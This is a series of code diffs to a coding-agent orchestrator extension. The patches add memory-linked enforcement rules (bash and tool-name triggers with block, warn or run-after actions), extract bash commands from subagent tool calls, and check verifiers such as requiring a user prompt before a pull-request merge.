-          .filter((c: any) => c.type === "text")
-          .map((c: any) => c.text || "")
-          .join("\n");
-        if (resultText) {
-          matches = matchBashCommand(nonBlockEntries, resultText);
-        }
-      }
+      // No fallback to prose text — only structured tool calls are reliable.
+      // Prose matching causes false positives (e.g., "git status" in a sentence).
     }
 
     if (matches.length === 0) return;

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -536,6 +536,9 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     if (toolName === "subagent") {
       const details = (event as any).details;
       const results = Array.isArray(details?.results) ? details.results : [];
+      if (!Array.isArray(details?.results) && details?.results) {
+        console.debug("[enforcement] subagent details.results is not an array, skipping extraction");
+      }
       const bashCommands: string[] = [];
       for (const r of results) {
         const msgs = Array.isArray(r?.messages) ? r.messages : [];

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -553,11 +553,13 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
       }
       const nonBlockEntries = entries.filter(e => e.action !== "block");
       if (bashCommands.length > 0) {
-        // Primary: match against ALL structured bash commands (not just first)
+        // Primary: match against ALL structured bash commands
+        const seen = new Set<string>();
         for (const cmd of bashCommands) {
           const cmdMatches = matchBashCommand(nonBlockEntries, cmd);
           for (const m of cmdMatches) {
-            if (!matches.some(existing => existing.rule.hash === m.rule.hash)) {
+            if (!seen.has(m.rule.hash)) {
+              seen.add(m.rule.hash);
               matches.push(m);
             }
           }

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -532,8 +532,7 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     let matches = matchToolCall(entries, toolName, input);
 
     // For subagent results, extract actual bash commands from the subagent's
-    // tool call messages (structured data). Falls back to result text if no
-    // structured tool calls are found (compaction, truncation).
+    // tool call messages (structured data only — no prose text fallback).
     if (toolName === "subagent" && matches.length === 0) {
       const details = (event as any).details;
       const results = details?.results || [];

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -535,12 +535,14 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     // tool call messages (structured data only — no prose text fallback).
     if (toolName === "subagent") {
       const details = (event as any).details;
-      const results = details?.results || [];
+      const results = Array.isArray(details?.results) ? details.results : [];
       const bashCommands: string[] = [];
       for (const r of results) {
-        for (const msg of r?.messages || []) {
+        const msgs = Array.isArray(r?.messages) ? r.messages : [];
+        for (const msg of msgs) {
           if (msg?.role !== "assistant") continue;
-          for (const part of msg?.content || []) {
+          const parts = Array.isArray(msg?.content) ? msg.content : [];
+          for (const part of parts) {
             // Check both field naming conventions (name/arguments and toolName/args)
             const toolName = part?.name || part?.toolName;
             const toolArgs = part?.arguments || part?.args;

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -532,7 +532,8 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     let matches = matchToolCall(entries, toolName, input);
 
     // For subagent results, extract actual bash commands from the subagent's
-    // tool call messages (structured data, not prose text matching).
+    // tool call messages (structured data). Falls back to result text if no
+    // structured tool calls are found (compaction, truncation).
     if (toolName === "subagent" && matches.length === 0) {
       const details = (event as any).details;
       const results = details?.results || [];
@@ -541,20 +542,34 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
         for (const msg of r?.messages || []) {
           if (msg?.role !== "assistant") continue;
           for (const part of msg?.content || []) {
-            if (part?.type === "toolCall" && part?.name === "bash" && part?.arguments?.command) {
-              bashCommands.push(part.arguments.command);
+            // Check both field naming conventions (name/arguments and toolName/args)
+            const toolName = part?.name || part?.toolName;
+            const toolArgs = part?.arguments || part?.args;
+            if (part?.type === "toolCall" && toolName === "bash" && toolArgs?.command) {
+              bashCommands.push(toolArgs.command);
             }
           }
         }
       }
+      const nonBlockEntries = entries.filter(e => e.action !== "block");
       if (bashCommands.length > 0) {
-        const nonBlockEntries = entries.filter(e => e.action !== "block");
+        // Primary: match against structured bash commands
         for (const cmd of bashCommands) {
           const cmdMatches = matchBashCommand(nonBlockEntries, cmd);
           if (cmdMatches.length > 0) {
             matches = cmdMatches;
             break;
           }
+        }
+      }
+      // Fallback: match against result text if no structured commands found
+      if (matches.length === 0) {
+        const resultText = ((event as any).content || [])
+          .filter((c: any) => c.type === "text")
+          .map((c: any) => c.text || "")
+          .join("\n");
+        if (resultText) {
+          matches = matchBashCommand(nonBlockEntries, resultText);
         }
       }
     }

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -537,7 +537,7 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
       const details = (event as any).details;
       const results = Array.isArray(details?.results) ? details.results : [];
       if (!Array.isArray(details?.results) && details?.results) {
-        console.debug("[enforcement] subagent details.results is not an array, skipping extraction");
+        console.debug(`[enforcement] subagent details.results is ${typeof details.results} (expected array), skipping bash extraction`);
       }
       const bashCommands: string[] = [];
       for (const r of results) {

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -539,6 +539,8 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
       if (!Array.isArray(details?.results) && details?.results) {
         console.debug(`[enforcement] subagent details.results is ${typeof details.results} (expected array), skipping bash extraction`);
       }
+      const nonBlockEntries = entries.filter(e => e.action !== "block");
+      const seen = new Set<string>();
       const bashCommands: string[] = [];
       for (const r of results) {
         const msgs = Array.isArray(r?.messages) ? r.messages : [];
@@ -546,19 +548,32 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
           if (msg?.role !== "assistant") continue;
           const parts = Array.isArray(msg?.content) ? msg.content : [];
           for (const part of parts) {
+            if (part?.type !== "toolCall") continue;
             // Check both field naming conventions (name/arguments and toolName/args)
-            const toolName = part?.name || part?.toolName;
-            const toolArgs = part?.arguments || part?.args;
-            if (part?.type === "toolCall" && toolName === "bash" && toolArgs?.command) {
-              bashCommands.push(toolArgs.command);
+            const partToolName = part?.name || part?.toolName;
+            const partToolArgs = part?.arguments || part?.args;
+            if (partToolName === "bash" && partToolArgs?.command) {
+              bashCommands.push(partToolArgs.command);
+            }
+            // Also check non-bash tool calls against tool_name/file_modified triggers
+            if (partToolName && partToolName !== "bash") {
+              const toolMatches = matchToolCall(
+                nonBlockEntries,
+                partToolName,
+                partToolArgs || {},
+              );
+              for (const m of toolMatches) {
+                if (!seen.has(m.rule.hash)) {
+                  seen.add(m.rule.hash);
+                  matches.push(m);
+                }
+              }
             }
           }
         }
       }
-      const nonBlockEntries = entries.filter(e => e.action !== "block");
       if (bashCommands.length > 0) {
-        // Primary: match against ALL structured bash commands
-        const seen = new Set<string>();
+        // Match against ALL structured bash commands
         for (const cmd of bashCommands) {
           const cmdMatches = matchBashCommand(nonBlockEntries, cmd);
           for (const m of cmdMatches) {

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -5,7 +5,7 @@
 
 import type { ExtensionAPI } from "@earendil-works/pi-coding-agent";
 import { isToolCallEventType } from "@earendil-works/pi-coding-agent";
-import { loadEnforcedEntries, matchToolCall, executeAction } from "./enforcement-rules.js";
+import { loadEnforcedEntries, matchToolCall, matchBashCommand, executeAction } from "./enforcement-rules.js";
 import { existsSync, readFileSync, writeFileSync } from "node:fs";
 import * as path from "node:path";
 import { join } from "node:path";
@@ -527,7 +527,21 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
     }
     if (entries.length === 0) return;
 
-    const matches = matchToolCall(entries, toolName, input);
+    let matches = matchToolCall(entries, toolName, input);
+
+    // For subagent results, also check bash_contains triggers against the
+    // result content — subagents run git commit/push internally and the
+    // orchestrator only sees the result text, not the bash commands.
+    if (toolName === "subagent" && matches.length === 0) {
+      const resultText = ((event as any).content || [])
+        .filter((c: any) => c.type === "text")
+        .map((c: any) => c.text || "")
+        .join("\n");
+      if (resultText) {
+        matches = matchBashCommand(entries.filter(e => e.action !== "block"), resultText);
+      }
+    }
+
     if (matches.length === 0) return;
 
     const currentContent = (event as any).content || [];

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -531,16 +531,31 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
 
     let matches = matchToolCall(entries, toolName, input);
 
-    // For subagent results, also check bash_contains triggers against the
-    // result content — subagents run git commit/push internally and the
-    // orchestrator only sees the result text, not the bash commands.
+    // For subagent results, extract actual bash commands from the subagent's
+    // tool call messages (structured data, not prose text matching).
     if (toolName === "subagent" && matches.length === 0) {
-      const resultText = ((event as any).content || [])
-        .filter((c: any) => c.type === "text")
-        .map((c: any) => c.text || "")
-        .join("\n");
-      if (resultText) {
-        matches = matchBashCommand(entries.filter(e => e.action !== "block"), resultText);
+      const details = (event as any).details;
+      const results = details?.results || [];
+      const bashCommands: string[] = [];
+      for (const r of results) {
+        for (const msg of r?.messages || []) {
+          if (msg?.role !== "assistant") continue;
+          for (const part of msg?.content || []) {
+            if (part?.type === "toolCall" && part?.name === "bash" && part?.arguments?.command) {
+              bashCommands.push(part.arguments.command);
+            }
+          }
+        }
+      }
+      if (bashCommands.length > 0) {
+        const nonBlockEntries = entries.filter(e => e.action !== "block");
+        for (const cmd of bashCommands) {
+          const cmdMatches = matchBashCommand(nonBlockEntries, cmd);
+          if (cmdMatches.length > 0) {
+            matches = cmdMatches;
+            break;
+          }
+        }
       }
     }
 

--- a/extensions/orchestrator/enforcement.ts
+++ b/extensions/orchestrator/enforcement.ts
@@ -553,12 +553,13 @@ export function registerEnforcement(pi: ExtensionAPI, inContainer?: boolean): vo
       }
       const nonBlockEntries = entries.filter(e => e.action !== "block");
       if (bashCommands.length > 0) {
-        // Primary: match against structured bash commands
+        // Primary: match against ALL structured bash commands (not just first)
         for (const cmd of bashCommands) {
           const cmdMatches = matchBashCommand(nonBlockEntries, cmd);
-          if (cmdMatches.length > 0) {
-            matches = cmdMatches;
-            break;
+          for (const m of cmdMatches) {
+            if (!matches.some(existing => existing.rule.hash === m.rule.hash)) {
+              matches.push(m);
+            }
           }
         }
       }

--- a/extensions/orchestrator/memory-scoring.ts
+++ b/extensions/orchestrator/memory-scoring.ts
@@ -274,9 +274,16 @@ function rebuildFromParsed(cwd: string, parsed: ParsedEntry[]): RebuildResult {
   }
 
   // Step 2: Remove scores for entries that no longer exist in topics
+  // Preserve entries with enforcement fields — they must not be deleted even
+  // if dreaming rewrites the topic file text (which changes the hash).
   const currentHashes = new Set(parsed.map((e) => entryHash(e.fullLine)));
   for (const hash of Object.keys(scores.entries)) {
     if (!currentHashes.has(hash)) {
+      const entry = scores.entries[hash];
+      if (entry && (entry.trigger || entry.verifier)) {
+        // Enforced entry — keep it, don't delete
+        continue;
+      }
       delete scores.entries[hash];
     }
   }

--- a/extensions/orchestrator/memory-scoring.ts
+++ b/extensions/orchestrator/memory-scoring.ts
@@ -141,9 +141,11 @@ export function calculateStability(
 /**
  * Determine lifecycle state from a stability score.
  */
-export function lifecycleFromScore(score: number, userState: UserState): LifecycleState {
+export function lifecycleFromScore(score: number, userState: UserState, entry?: ScoredEntry): LifecycleState {
   if (userState === "pinned") return "active";
   if (userState === "forgotten") return "dropped";
+  // Enforced entries (with trigger/action/verifier) never decay below active
+  if (entry && (entry.trigger || entry.verifier)) return "active";
   if (score >= PINNED_SCORE) return "active";
   if (score >= TAU_PROMOTE) return "active";
   if (score >= TAU_PROVISIONAL) return "provisional";
@@ -251,7 +253,7 @@ function rebuildFromParsed(cwd: string, parsed: ParsedEntry[]): RebuildResult {
         existing.class,
         existing.userState,
       );
-      existing.lifecycle = lifecycleFromScore(existing.score, existing.userState);
+      existing.lifecycle = lifecycleFromScore(existing.score, existing.userState, existing);
     } else {
       // New entry — initialize
       const userState: UserState = entry.section === "pinned" ? "pinned" : "auto";
@@ -351,7 +353,7 @@ export function reinforce(cwd: string, entryLine: string): boolean {
     entry.class,
     entry.userState,
   );
-  entry.lifecycle = lifecycleFromScore(entry.score, entry.userState);
+  entry.lifecycle = lifecycleFromScore(entry.score, entry.userState, entry);
   saveScores(cwd, scores);
   return true;
 }

--- a/extensions/orchestrator/memory-scoring.ts
+++ b/extensions/orchestrator/memory-scoring.ts
@@ -144,8 +144,8 @@ export function calculateStability(
 export function lifecycleFromScore(score: number, userState: UserState, entry?: ScoredEntry): LifecycleState {
   if (userState === "pinned") return "active";
   if (userState === "forgotten") return "dropped";
-  // Enforced entries (with trigger/action/verifier) never decay below active
-  if (entry && (entry.trigger || entry.verifier)) return "active";
+  // Enforced entries never decay below active — require trigger+action or verifier
+  if (entry && ((entry.trigger && entry.action) || entry.verifier)) return "active";
   if (score >= PINNED_SCORE) return "active";
   if (score >= TAU_PROMOTE) return "active";
   if (score >= TAU_PROVISIONAL) return "provisional";

--- a/extensions/orchestrator/memory-scoring.ts
+++ b/extensions/orchestrator/memory-scoring.ts
@@ -19,6 +19,19 @@ export type CueType = "explicit" | "structural" | "behavioral" | "recurrence";
 export type UserState = "auto" | "pinned" | "forgotten";
 export type LifecycleState = "active" | "provisional" | "candidate" | "dropped";
 
+/** Trigger types for enforcement rules */
+export type EnforcementTrigger =
+  | `bash_contains ${string}`   // matches if bash command contains the string
+  | `bash_regex ${string}`      // matches if bash command matches the regex
+  | `tool_name ${string}`       // matches if tool name equals the string
+  | `file_modified ${string}`;  // matches if a write/edit targets a matching path glob
+
+/** Action types for enforcement rules */
+export type EnforcementAction =
+  | "block"       // block the tool call, return error
+  | "run_after"   // run a command after the tool succeeds
+  | "warn";       // append warning to tool result
+
 export interface ScoredEntry {
   /** Category of the memory */
   class: MemoryCategory;
@@ -36,6 +49,16 @@ export interface ScoredEntry {
   userState: UserState;
   /** Current lifecycle state */
   lifecycle: LifecycleState;
+
+  // ── Enforcement fields (optional) ──────────────────────────────────
+  /** What activates this rule (e.g., 'bash_contains git add .') */
+  trigger?: EnforcementTrigger;
+  /** What to do when triggered: block, run_after, warn */
+  action?: EnforcementAction;
+  /** Command to run (for run_after action) */
+  actionCommand?: string;
+  /** Semantic verifier — condition to check (e.g., 'tool_called ask_user before gh pr merge') */
+  verifier?: string;
 }
 
 export interface ScoresFile {

--- a/extensions/orchestrator/memory-scoring.ts
+++ b/extensions/orchestrator/memory-scoring.ts
@@ -280,8 +280,10 @@ function rebuildFromParsed(cwd: string, parsed: ParsedEntry[]): RebuildResult {
   for (const hash of Object.keys(scores.entries)) {
     if (!currentHashes.has(hash)) {
       const entry = scores.entries[hash];
-      if (entry && (entry.trigger || entry.verifier)) {
-        // Enforced entry — keep it, don't delete
+      if (entry && ((entry.trigger && entry.action) || entry.verifier)) {
+        // Enforced entry (trigger+action or verifier) — keep it
+        // Mark as orphaned so budgeting excludes it
+        (entry as any)._orphaned = true;
         continue;
       }
       delete scores.entries[hash];
@@ -291,6 +293,8 @@ function rebuildFromParsed(cwd: string, parsed: ParsedEntry[]): RebuildResult {
   // Step 3: Apply per-category budgets
   const byCategory: Record<string, { hash: string; entry: ScoredEntry }[]> = {};
   for (const [hash, entry] of Object.entries(scores.entries)) {
+    // Skip orphaned enforced entries from budgeting — they don't have topic file backing
+    if ((entry as any)._orphaned) continue;
     if (entry.lifecycle === "active") {
       if (!byCategory[entry.class]) byCategory[entry.class] = [];
       byCategory[entry.class]!.push({ hash, entry });
@@ -324,7 +328,10 @@ function rebuildFromParsed(cwd: string, parsed: ParsedEntry[]): RebuildResult {
     }
   }
 
-  // Step 6: Save
+  // Step 6: Clean up internal markers and save
+  for (const entry of Object.values(scores.entries)) {
+    delete (entry as any)._orphaned;
+  }
   scores.lastRebuild = new Date(now).toISOString();
   saveScores(cwd, scores);
 

--- a/extensions/orchestrator/memory-tools.ts
+++ b/extensions/orchestrator/memory-tools.ts
@@ -277,6 +277,31 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
         return { content: [{ type: "text", text: `Invalid category "${category}". Valid: ${validCategories.join(", ")}` }] };
       }
 
+      // Validate enforcement parameters
+      if (params.trigger) {
+        const validPrefixes = ["bash_contains ", "bash_regex ", "tool_name ", "file_modified "];
+        if (!validPrefixes.some(p => params.trigger!.startsWith(p))) {
+          return {
+            content: [{
+              type: "text",
+              text: `Invalid trigger format "${params.trigger}". Must start with: ${validPrefixes.map(p => p.trim()).join(", ")}`,
+            }],
+          };
+        }
+      }
+      if (params.action) {
+        const validActions = ["block", "warn"];
+        const isRunAfter = params.action.startsWith("run_after ");
+        if (!validActions.includes(params.action) && !isRunAfter) {
+          return {
+            content: [{
+              type: "text",
+              text: `Invalid action "${params.action}". Valid: block, warn, run_after <command>`,
+            }],
+          };
+        }
+      }
+
       // Canonical line (no pinned marker) — used for hashing/scoring
       const canonicalLine = `- [${category}] ${text}`;
       // File line — includes pinned marker for display

--- a/extensions/orchestrator/memory-tools.ts
+++ b/extensions/orchestrator/memory-tools.ts
@@ -300,6 +300,14 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
             }],
           };
         }
+        if (isRunAfter && !params.action.slice("run_after ".length).trim()) {
+          return {
+            content: [{
+              type: "text",
+              text: `Invalid action "${params.action}". run_after requires a command (e.g., 'run_after .dev/deploy-all.sh')`,
+            }],
+          };
+        }
       }
 
       // Canonical line (no pinned marker) — used for hashing/scoring

--- a/extensions/orchestrator/memory-tools.ts
+++ b/extensions/orchestrator/memory-tools.ts
@@ -329,12 +329,36 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
           if (vm.similarity >= NEAR_DUPLICATE_THRESHOLD) {
             const existingLine = `- [${vm.category}] ${vm.text}`;
             if (reinforce(cwd, existingLine)) {
+              // Merge enforcement fields into existing entry if new entry has them
+              if (params.trigger || params.verifier) {
+                const scores = loadScores(cwd);
+                const existingHash = entryHash(existingLine);
+                const existingEntry = scores.entries[existingHash];
+                if (existingEntry) {
+                  if (params.trigger) {
+                    existingEntry.trigger = params.trigger as any;
+                    if (params.action) {
+                      if (params.action.startsWith("run_after ")) {
+                        existingEntry.action = "run_after";
+                        existingEntry.actionCommand = params.action.slice("run_after ".length);
+                      } else if (params.action === "block" || params.action === "warn") {
+                        existingEntry.action = params.action;
+                      }
+                    }
+                  }
+                  if (params.verifier) {
+                    existingEntry.verifier = params.verifier;
+                  }
+                  saveScores(cwd, scores);
+                }
+              }
               // Remove the just-embedded entry since we're reinforcing instead of adding
               await removeEmbedding(cwd, text, category);
+              const enforcementNote = (params.trigger || params.verifier) ? " (enforcement fields merged)" : "";
               return {
                 content: [{
                   type: "text",
-                  text: `Near-duplicate found (similarity: ${vm.similarity.toFixed(3)}) — reinforced instead: [${vm.category}] ${vm.text}`,
+                  text: `Near-duplicate found (similarity: ${vm.similarity.toFixed(3)}) — reinforced instead: [${vm.category}] ${vm.text}${enforcementNote}`,
                 }],
               };
             }
@@ -351,8 +375,32 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
         if (te.text === text && te.category === category) {
           // Reinforce instead of duplicating — always use canonical line (no pinned marker)
           reinforce(cwd, canonicalLine);
+          // Merge enforcement fields into existing entry if new entry has them
+          if (params.trigger || params.verifier) {
+            const scores = loadScores(cwd);
+            const existingHash = entryHash(canonicalLine);
+            const existingEntry = scores.entries[existingHash];
+            if (existingEntry) {
+              if (params.trigger) {
+                existingEntry.trigger = params.trigger as any;
+                if (params.action) {
+                  if (params.action.startsWith("run_after ")) {
+                    existingEntry.action = "run_after";
+                    existingEntry.actionCommand = params.action.slice("run_after ".length);
+                  } else if (params.action === "block" || params.action === "warn") {
+                    existingEntry.action = params.action;
+                  }
+                }
+              }
+              if (params.verifier) {
+                existingEntry.verifier = params.verifier;
+              }
+              saveScores(cwd, scores);
+            }
+          }
           // No removeEmbedding here — same text/category key as existing entry, embedding is still valid
-          return { content: [{ type: "text", text: `Already exists — reinforced instead: [${category}] ${text}` }] };
+          const enforcementNote = (params.trigger || params.verifier) ? " (enforcement fields merged)" : "";
+          return { content: [{ type: "text", text: `Already exists — reinforced instead: [${category}] ${text}${enforcementNote}` }] };
         }
       }
 

--- a/extensions/orchestrator/memory-tools.ts
+++ b/extensions/orchestrator/memory-tools.ts
@@ -249,6 +249,21 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
           description: "Pin this memory (never decays, never removed by dreaming). Only when user explicitly says 'remember this'.",
         }),
       ),
+      trigger: Type.Optional(
+        Type.String({
+          description: "Enforcement trigger (e.g., 'bash_contains git add .', 'tool_name write', 'file_modified *.py'). When set, this memory becomes code-enforced.",
+        }),
+      ),
+      action: Type.Optional(
+        Type.String({
+          description: "Enforcement action: 'block' (prevent), 'run_after <command>' (execute after), 'warn' (append warning)",
+        }),
+      ),
+      verifier: Type.Optional(
+        Type.String({
+          description: "Semantic verifier condition (e.g., 'tool_called ask_user before gh pr merge'). Checked at turn_end.",
+        }),
+      ),
     }),
     async execute(_toolCallId, params, _signal, _onUpdate, ctx) {
       const cwd = ctx.cwd;
@@ -352,7 +367,7 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
       // Add score entry — always hash the canonical line (no pinned marker)
       const scores = loadScores(cwd);
       const hash = entryHash(canonicalLine);
-      scores.entries[hash] = {
+      const entry: ScoredEntry = {
         class: category,
         score: isPinned ? PINNED_SCORE : 1.0,
         evidenceCount: 1,
@@ -361,7 +376,26 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
         lastReinforced: new Date().toISOString(),
         userState: isPinned ? "pinned" : "auto",
         lifecycle: "active",
-      } as ScoredEntry;
+      };
+
+      // Add enforcement fields if provided
+      if (params.trigger) {
+        entry.trigger = params.trigger as any;
+        // Parse action — "run_after <cmd>" splits into action + actionCommand
+        if (params.action) {
+          if (params.action.startsWith("run_after ")) {
+            entry.action = "run_after";
+            entry.actionCommand = params.action.slice("run_after ".length);
+          } else if (params.action === "block" || params.action === "warn") {
+            entry.action = params.action;
+          }
+        }
+      }
+      if (params.verifier) {
+        entry.verifier = params.verifier;
+      }
+
+      scores.entries[hash] = entry;
       saveScores(cwd, scores);
 
       // Embed the new entry (no-op if already embedded during dedup check above)

--- a/extensions/orchestrator/memory-tools.ts
+++ b/extensions/orchestrator/memory-tools.ts
@@ -330,31 +330,33 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
             const existingLine = `- [${vm.category}] ${vm.text}`;
             if (reinforce(cwd, existingLine)) {
               // Merge enforcement fields into existing entry if new entry has them
-              if (params.trigger || params.verifier) {
+              let merged = false;
+              if (params.trigger || params.action || params.verifier) {
                 const scores = loadScores(cwd);
                 const existingHash = entryHash(existingLine);
                 const existingEntry = scores.entries[existingHash];
                 if (existingEntry) {
                   if (params.trigger) {
                     existingEntry.trigger = params.trigger as any;
-                    if (params.action) {
-                      if (params.action.startsWith("run_after ")) {
-                        existingEntry.action = "run_after";
-                        existingEntry.actionCommand = params.action.slice("run_after ".length);
-                      } else if (params.action === "block" || params.action === "warn") {
-                        existingEntry.action = params.action;
-                      }
+                  }
+                  if (params.action) {
+                    if (params.action.startsWith("run_after ")) {
+                      existingEntry.action = "run_after";
+                      existingEntry.actionCommand = params.action.slice("run_after ".length);
+                    } else if (params.action === "block" || params.action === "warn") {
+                      existingEntry.action = params.action;
                     }
                   }
                   if (params.verifier) {
                     existingEntry.verifier = params.verifier;
                   }
                   saveScores(cwd, scores);
+                  merged = true;
                 }
               }
               // Remove the just-embedded entry since we're reinforcing instead of adding
               await removeEmbedding(cwd, text, category);
-              const enforcementNote = (params.trigger || params.verifier) ? " (enforcement fields merged)" : "";
+              const enforcementNote = merged ? " (enforcement fields merged)" : "";
               return {
                 content: [{
                   type: "text",
@@ -376,30 +378,32 @@ export function registerMemoryTools(pi: ExtensionAPI): void {
           // Reinforce instead of duplicating — always use canonical line (no pinned marker)
           reinforce(cwd, canonicalLine);
           // Merge enforcement fields into existing entry if new entry has them
-          if (params.trigger || params.verifier) {
+          let merged = false;
+          if (params.trigger || params.action || params.verifier) {
             const scores = loadScores(cwd);
             const existingHash = entryHash(canonicalLine);
             const existingEntry = scores.entries[existingHash];
             if (existingEntry) {
               if (params.trigger) {
                 existingEntry.trigger = params.trigger as any;
-                if (params.action) {
-                  if (params.action.startsWith("run_after ")) {
-                    existingEntry.action = "run_after";
-                    existingEntry.actionCommand = params.action.slice("run_after ".length);
-                  } else if (params.action === "block" || params.action === "warn") {
-                    existingEntry.action = params.action;
-                  }
+              }
+              if (params.action) {
+                if (params.action.startsWith("run_after ")) {
+                  existingEntry.action = "run_after";
+                  existingEntry.actionCommand = params.action.slice("run_after ".length);
+                } else if (params.action === "block" || params.action === "warn") {
+                  existingEntry.action = params.action;
                 }
               }
               if (params.verifier) {
                 existingEntry.verifier = params.verifier;
               }
               saveScores(cwd, scores);
+              merged = true;
             }
           }
           // No removeEmbedding here — same text/category key as existing entry, embedding is still valid
-          const enforcementNote = (params.trigger || params.verifier) ? " (enforcement fields merged)" : "";
+          const enforcementNote = merged ? " (enforcement fields merged)" : "";
           return { content: [{ type: "text", text: `Already exists — reinforced instead: [${category}] ${text}${enforcementNote}` }] };
         }
       }

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -342,18 +342,21 @@ export function registerRules(
       const { loadVerifierEntries, checkVerifiers } = await import("./enforcement-rules.js");
       const verifierEntries = loadVerifierEntries(ctx.cwd);
       if (verifierEntries.length > 0) {
-        const turnToolResults = ((_event as any).toolResults || []).map((tr: any) => ({
-          toolName: tr?.toolName || "",
-          input: tr?.input || {},
-        }));
-        const violations = checkVerifiers(verifierEntries, turnToolResults);
+        const rawResults = (_event as any).toolResults;
+        if (rawResults && Array.isArray(rawResults) && rawResults.length > 0) {
+          const turnToolResults = rawResults.map((tr: any) => ({
+            toolName: tr?.toolName || "",
+            input: tr?.input || {},
+          }));
+          const violations = checkVerifiers(verifierEntries, turnToolResults);
 
-        if (violations.length > 0) {
-          pi.sendMessage({
-            customType: "enforcement-violation",
-            content: `\u26d4 ENFORCEMENT VIOLATION \u2014 fix before continuing:\n\n${violations.map(v => `- ${v}`).join("\n")}`,
-            display: true,
-          }, { triggerTurn: true, deliverAs: "followUp" });
+          if (violations.length > 0) {
+            pi.sendMessage({
+              customType: "enforcement-violation",
+              content: `\u26d4 ENFORCEMENT VIOLATION \u2014 fix before continuing:\n\n${violations.map(v => `- ${v}`).join("\n")}`,
+              display: true,
+            }, { triggerTurn: true, deliverAs: "followUp" });
+          }
         }
       }
     } catch (e: any) { console.debug("[rules] semantic enforcement failed:", e?.message?.slice(0, 100)); }

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -339,51 +339,34 @@ export function registerRules(
 
     // Semantic enforcement: check verifier rules against this turn's tool calls
     try {
-      const { loadVerifierEntries, matchToolCall } = await import("./enforcement-rules.js");
+      const { loadVerifierEntries } = await import("./enforcement-rules.js");
       const verifierEntries = loadVerifierEntries(ctx.cwd);
       if (verifierEntries.length > 0) {
         const turnToolResults = (_event as any).toolResults || [];
         const violations: string[] = [];
 
         for (const rule of verifierEntries) {
-          if (!rule.verifier) continue;
-
-          // Check if the trigger was activated this turn
-          let triggered = false;
-          for (const tr of turnToolResults) {
-            const trName = (tr as any)?.toolName || "";
-            const trInput = (tr as any)?.input || {};
-            if (matchToolCall([rule], trName, trInput).length > 0) {
-              triggered = true;
-              break;
-            }
-          }
-          if (!triggered) continue;
-
           // Verifier format: "tool_called <tool> before <command>"
-          // Check if the required tool was called before the triggering tool
           const verifierMatch = rule.verifier.match(/^tool_called (\S+) before (.+)$/);
-          if (verifierMatch) {
-            const requiredTool = verifierMatch[1];
-            const beforeCommand = verifierMatch[2];
+          if (!verifierMatch) continue;
 
-            // Find index of the triggering command and the required tool
-            let requiredIdx = -1;
-            let triggerIdx = -1;
-            for (let i = 0; i < turnToolResults.length; i++) {
-              const trName = (turnToolResults[i] as any)?.toolName || "";
-              const trInput = (turnToolResults[i] as any)?.input || {};
-              if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
-              // `includes` is intentionally used here — beforeCommand is a specific
-              // command substring (e.g. "gh pr merge") that we want to find anywhere
-              // in the bash command string. This is correct for our use case.
-              if (trName === "bash" && trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
-            }
+          const requiredTool = verifierMatch[1];
+          const beforeCommand = verifierMatch[2];
 
-            // Violation: trigger was called but required tool was not called before it
-            if (triggerIdx >= 0 && (requiredIdx < 0 || requiredIdx >= triggerIdx)) {
-              violations.push(rule.verifier);
-            }
+          // Find indices: where the triggering command appeared, and where the required tool was called
+          let requiredIdx = -1;
+          let triggerIdx = -1;
+          for (let i = 0; i < turnToolResults.length; i++) {
+            const trName = (turnToolResults[i] as any)?.toolName || "";
+            const trInput = (turnToolResults[i] as any)?.input || {};
+            if (trName === requiredTool && requiredIdx === -1) requiredIdx = i;
+            // beforeCommand is a specific substring (e.g. "gh pr merge")
+            if (trName === "bash" && trInput?.command?.includes(beforeCommand) && triggerIdx === -1) triggerIdx = i;
+          }
+
+          // Violation: the command ran but the required tool was not called before it
+          if (triggerIdx >= 0 && (requiredIdx < 0 || requiredIdx >= triggerIdx)) {
+            violations.push(rule.verifier);
           }
         }
 

--- a/extensions/orchestrator/rules.ts
+++ b/extensions/orchestrator/rules.ts
@@ -339,7 +339,7 @@ export function registerRules(
 
     // Semantic enforcement: check verifier rules against this turn's tool calls
     try {
-      const { loadVerifierEntries } = await import("./enforcement-rules.js");
+      const { loadVerifierEntries, matchToolCall } = await import("./enforcement-rules.js");
       const verifierEntries = loadVerifierEntries(ctx.cwd);
       if (verifierEntries.length > 0) {
         const turnToolResults = (_event as any).toolResults || [];
